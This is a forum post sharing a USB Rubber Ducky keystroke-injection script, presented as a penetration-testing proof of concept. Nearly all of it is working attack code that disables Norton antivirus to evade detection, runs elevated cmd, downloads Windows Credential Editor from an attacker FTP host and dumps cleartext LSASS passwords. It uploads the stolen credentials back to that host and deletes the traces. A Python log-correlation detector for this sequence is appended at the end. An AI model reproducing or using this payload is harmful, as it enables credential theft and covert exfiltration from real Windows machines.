Hi Folks,
I wanted to share a new script I developed that shows a proof of concept for a rubber ducky and Windows Credential Editor (WCE) script that would do the following:


1.) Disable Antivirus for 15 minutes, which is the default. (This must be done to avoid signature detection of the WCE executable)

2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE

3.) Script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it will not write to the output file.

4.) Script will then upload the file containing cleartext passwords for users logged in based on LSASS memory

5.) The script will then remove all WCE executables as well as the cleartext password file created before the antivirus program automatically starts. Then it closes all appropriate windows.


The video demo can be found at:
http://youtu.be/IqUci4buvvM



Below is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement.

----------------------------------------------------------------------------------------------------------------------------------------------
code below:


REM ######################################################################################################
REM # Author: G1 #
REM # OS Designed and Tested on: Windows 7 SP1 x64 #
REM # Anti-Virus Version: Norton Security Suite v 6.4.0.9 on Windows 7 OS #
REM # FTP Platform: Backtrack 5 R3 / PureFTPD #
REM # Rubber Ducky Encoder Required: Use Dnucna's 2.1 or greater #
REM # http://code.google.com/p/ducky-decode/downloads/list #
REM # #
REM # This script was developed and intended to capture cleartext credentials stored in LSASS via #
REM # Windows Credential Editor(WCE).  The method process below contains these main sections: #
REM # #
REM #   1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signature #
REM #       detection of WCE executables) #
REM #   2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE #
REM #   3.) Script then executes both versions, sending the output to a text file with the computer name #
REM #       as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it #
REM #       will not write to the output file. #
REM #   4.) Script will then upload the file containing cleartext passwords for users logged in based on #
REM #       LSASS memory #
REM #   5.) The script will then remove all WCE executables as well the cleartext password file   #
REM #       created before the antivirus program automatically start. Then closes all appropriate windows#
REM # #
REM # Prerequisites: #
REM #  - User of the targeted system MUST have ADMINISTRATOR level access. #
REM #  - Attacker must maintain a copy of the 32-bit and 64-bit version of WCE in their FTP directory #
REM #  - Attacker's FTP server must have at least one directory that is writable. #
REM # #
REM # This script is meant as a guide and proof of concept of the usb rubber ducky. Tweaks for AV #
REM # versions, FTP versions and delay times may vary depending on the environment. #
REM # #
REM #         #
REM # #
REM ######################################################################################################
REM
REM ***********************************************************************************
REM ****************NORTON-SECURITY-SUITE-N360*****************************************
REM **********ANTI-VIRUS-VERSION-6.4.0.9--OS:Windows7**********************************
REM ******************15-Minute-Disable************************************************
REM ***********************************************************************************
DELAY 1000
CTRL ESCAPE
DELAY 200
STRING Norton Security Suite
DELAY 100
ENTER
DELAY 3000
TAB
DELAY 500
ENTER
DELAY 2500
TAB
TAB
DELAY 50
ENTER
DELAY 2500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 500
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
TAB
DELAY 50
ENTER
DELAY 500
SHIFT TAB
DELAY 50
ENTER
DELAY 3000
SHIFT TAB
DELAY 100
ENTER
DELAY 2000
SHIFT TAB
DELAY 100
ENTER
DELAY 1000
ALT F4
REM ***********************************************************************************
REM ********************END-OF-NORTON-AV-DISABLE***************************************
REM ***********************************************************************************
REM                   -------------------------------------
REM ***********************************************************************************
REM FTP spawn to retrieve Windows Credential Editor 32-bit and 64-bit executables(wce.exe and wce_64.exe)
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 500
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
STRING ftp 192.168.1.140
ENTER
DELAY 1000
REM FTP USERNAME below
STRING <FTP USER>
ENTER
DELAY 500
REM FTP User password
STRING <FTP PASSWORD>
ENTER
DELAY 700
STRING binary
ENTER
DELAY 100
STRING prompt
ENTER
DELAY 100
REM Assuming the wce.exe and wce_64.exe are in the root directory of the FTP server.
STRING mget wce*
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Opening second Administrative command window to process FTP executables
REM ***********************************************************************************
REM ***********************************************************************************
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 64-bit and saving the file as %computername%-cleartext-PWs-64bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce_64.exe -w -o %computername%-cleartext-PWs-64bit.txt
ENTER
DELAY 3000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 32-bit and saving the file as %computername%-cleartext-PWs-32bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce.exe -w -o %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 3000
ALT TAB
REM ***********************************************************************************
REM ***********************************************************************************
REM Back to FTP session on initial command window, entering writable directory for upload
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 200
STRING cd upload
ENTER
DELAY 100
REM ***********************************************************************************
REM ***********************************************************************************
REM Upload all cleartext password files from the Windows Credential Editor command.
REM ***********************************************************************************
REM ***********************************************************************************
STRING mput *cleartext-PWs*
ENTER
DELAY 2000
STRING quit
ENTER
DELAY 500
STRING exit
ENTER
DELAY 50
REM ***********************************************************************************
REM ***********************************************************************************
REM Cleaning up the files created and exiting command windows.
REM ***********************************************************************************
REM ***********************************************************************************
STRING del wce.exe wce_64.exe %computername%-cleartext-PWs-64bit.txt %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 100
STRING exit
ENTER
 


------------------------------------------------------------------------------------------------------------------------

Edited by midnitesnake
corrected formatting
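From the defender's side, the sequence the script produces (an elevated cmd.exe spawning ftp.exe, a wce*.exe run with -w/-o, then deletion of the *cleartext-PWs* output file, all inside the 15-minute AV-disable window) is what an endpoint-log correlation rule should key on. The following is an added example, not code from the post: it runs that correlation over constructed Sysmon-style events; the event shape, field names and sample values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

WCE_IMAGE = re.compile(r"(^|\\)wce(_64)?\.exe$", re.I)   # wce.exe / wce_64.exe
WCE_ARGS = re.compile(r"(^|\s)-w(\s|$)")                  # -w: dump cleartext passwords
DUMP_NAME = re.compile(r"cleartext-pws", re.I)            # output file name used in the post
WINDOW = timedelta(minutes=15)                            # AV-disable window from the post

# Constructed sample events (not real logs): event 1 = process create,
# event 23 = file delete, loosely modelled on Sysmon field names.
SAMPLE_EVENTS = [
    {"ts": "2013-03-01T10:00:05", "host": "WS01", "event": 1, "integrity": "High",
     "image": r"C:\Windows\System32\ftp.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ftp 192.168.1.140"},
    {"ts": "2013-03-01T10:00:20", "host": "WS01", "event": 1, "integrity": "High",
     "image": r"C:\Users\bob\wce_64.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wce_64.exe -w -o WS01-cleartext-PWs-64bit.txt"},
    {"ts": "2013-03-01T10:00:40", "host": "WS01", "event": 23,
     "image": r"C:\Windows\System32\cmd.exe", "target": r"C:\Users\bob\WS01-cleartext-PWs-64bit.txt"},
    # Benign-looking: an elevated ftp session with no dump or deletion afterwards.
    {"ts": "2013-03-01T11:00:00", "host": "WS02", "event": 1, "integrity": "High",
     "image": r"C:\Windows\System32\ftp.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ftp files.example.test"},
]

def classify(ev):
    """Map one event to an indicator name, or None if it is not of interest."""
    if ev["event"] == 1:
        image, parent = ev["image"].lower(), ev.get("parent", "").lower()
        if image.endswith("\\ftp.exe") and parent.endswith("\\cmd.exe") and ev.get("integrity") == "High":
            return "elevated_ftp"
        if WCE_IMAGE.search(ev["image"]) and WCE_ARGS.search(ev.get("cmdline", "")):
            return "wce_dump"
    elif ev["event"] == 23 and DUMP_NAME.search(ev.get("target", "")):
        return "dump_file_deleted"
    return None

def correlate(events, window=WINDOW, min_indicators=2):
    """Return {host: sorted indicators} for hosts with at least `min_indicators`
    distinct indicators whose first occurrences all fall within `window`."""
    first_seen = defaultdict(dict)  # host -> indicator -> first timestamp
    for ev in events:
        name = classify(ev)
        if name:
            first_seen[ev["host"]].setdefault(name, datetime.fromisoformat(ev["ts"]))
    return {host: sorted(ind) for host, ind in first_seen.items()
            if len(ind) >= min_indicators and max(ind.values()) - min(ind.values()) <= window}

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))  # {'WS01': ['dump_file_deleted', 'elevated_ftp', 'wce_dump']}
```

A single wce_dump indicator is already worth alerting on its own (lower min_indicators to 1); the correlation mainly suppresses noise from ordinary elevated ftp.exe use.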